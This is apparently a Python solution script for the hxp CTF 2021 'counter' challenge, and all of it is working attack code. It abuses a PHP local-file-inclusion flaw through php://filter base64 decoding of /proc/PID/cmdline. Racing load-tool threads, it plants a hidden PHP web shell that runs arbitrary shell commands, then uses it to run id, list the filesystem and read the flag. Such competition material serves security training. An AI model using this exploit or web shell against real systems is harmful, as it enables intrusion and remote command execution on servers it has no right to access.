#!/usr/bin/env python3# hxp CTF 2021 counterimport requests, threading, time

1. #!/usr/bin/env python3
2. # hxp CTF 2021 counter
3. import requests, threading, time,os, base64, re, tempfile, subprocess,secrets, hashlib, sys, random, signal
4. from urllib.parse import urlparse,quote_from_bytes
5. def urlencode(data, safe=''):
6.     return quote_from_bytes(data, safe)
7.  
8. url = f'http://{sys.argv[1]}:{sys.argv[2]}/'
9.  
10. backdoor_name = secrets.token_hex(8) + '.php'
11. secret = secrets.token_hex(16)
12. secret_hash = hashlib.sha1(secret.encode()).hexdigest()
13.  
14. print('[+] backdoor_name: ' + backdoor_name, file=sys.stderr)
15. print('[+] secret: ' + secret, file=sys.stderr)
16.  
17. code = f"<?php if(sha1($_GET['s'])==='{secret_hash}')echo shell_exec($_GET['c']);".encode()
18. payload = f"""<?php if(sha1($_GET['s'])==='{secret_hash}')file_put_contents("{backdoor_name}",$_GET['p']);/*""".encode()
19. payload_encoded = b'abcdfg' + base64.b64encode(payload)
20. print(payload_encoded)
21. assert re.match(b'^[a-zA-Z0-9]+$', payload_encoded)
22.  
23. with tempfile.NamedTemporaryFile() as tmp:
24.     tmp.write(b"sh\x00-c\x00rm\x00-f\x00--\x00'"+ payload_encoded +b"'")
25.     tmp.flush()
26.     o = subprocess.check_output(['php','-r', f'echo file_get_contents("php://filter/convert.base64-decode/resource={tmp.name}");'])
27.     print(o, file=sys.stderr)
28.     assert payload in o
29.  
30.     os.chdir('/tmp')
31.     subprocess.check_output(['php','-r', f'$_GET = ["p" => "test", "s" => "{secret}"]; include("php://filter/convert.base64-decode/resource={tmp.name}");'])
32.     with open(backdoor_name) as f:
33.         d = f.read()
34.         assert d == 'test'
35.  
36.  
37. pid = -1
38. N = 10
39.  
40. done = False
41.  
42. def worker(i):
43.     time.sleep(1)
44.     while not done:
45.         print(f'[+] starting include worker: {pid + i}', file=sys.stderr)
46.         s = f"""bombardier -c 1 -d 3m '{url}?page=php%3A%2F%2Ffilter%2Fconvert.base64-decode%2Fresource%3D%2Fproc%2F{pid + i}%2Fcmdline&p={urlencode(code)}&s={secret}' > /dev/null"""
47.         os.system(s)
48.  
49. def delete_worker():
50.     time.sleep(1)
51.     while not done:
52.         print('[+] starting delete worker', file=sys.stderr)
53.         s = f"""bombardier -c 8 -d 3m '{url}?page={payload_encoded.decode()}&reset=1' > /dev/null"""
54.         os.system(s)
55.  
56. for i in range(N):
57.     threading.Thread(target=worker, args=(i, ), daemon=True).start()
58. threading.Thread(target=delete_worker, daemon=True).start()
59.  
60.  
61. while not done:
62.     try:
63.         r = requests.get(url, params={
64.             'page': '/proc/sys/kernel/ns_last_pid'
65.         }, timeout=10)
66.         print(f'[+] pid: {pid}', file=sys.stderr)
67.         if int(r.text) > (pid+N):
68.             pid = int(r.text) + 200
69.             print(f'[+] pid overflow: {pid}', file=sys.stderr)
70.             os.system('pkill -9 -x bombardier')
71.  
72.         r = requests.get(f'{url}data/{backdoor_name}', params={
73.             's' : secret,
74.             'c': f'id; ls -l /; /readflag; rm {backdoor_name}'
75.         }, timeout=10)
76.  
77.         if r.status_code == 200:
78.             print(r.text)
79.             done = True
80.             os.system('pkill -9 -x bombardier')
81.             exit()
82.  
83.  
84.         time.sleep(0.5)
85.     except Exception as e:
86.         print(e, file=sys.stderr)
87.  
88.